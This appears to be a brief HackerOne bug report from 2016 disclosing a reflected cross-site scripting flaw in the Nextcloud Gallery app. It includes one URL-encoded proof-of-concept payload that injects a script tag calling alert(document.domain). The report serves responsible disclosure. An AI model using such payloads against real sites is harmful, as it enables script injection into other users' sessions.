Nextcloud: Reflected XSS in Gallery App

2016-09-04T15:59:09
ID H1:165686
Type hackerone
Reporter soreks
Modified 2016-12-03T22:01:12

Description

Go to: nextcloud/index.php/apps/gallery/#%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3Ejavascript:alert%280%29//%00

Tested on: Firefox 43.0.1

If you need more information then write me.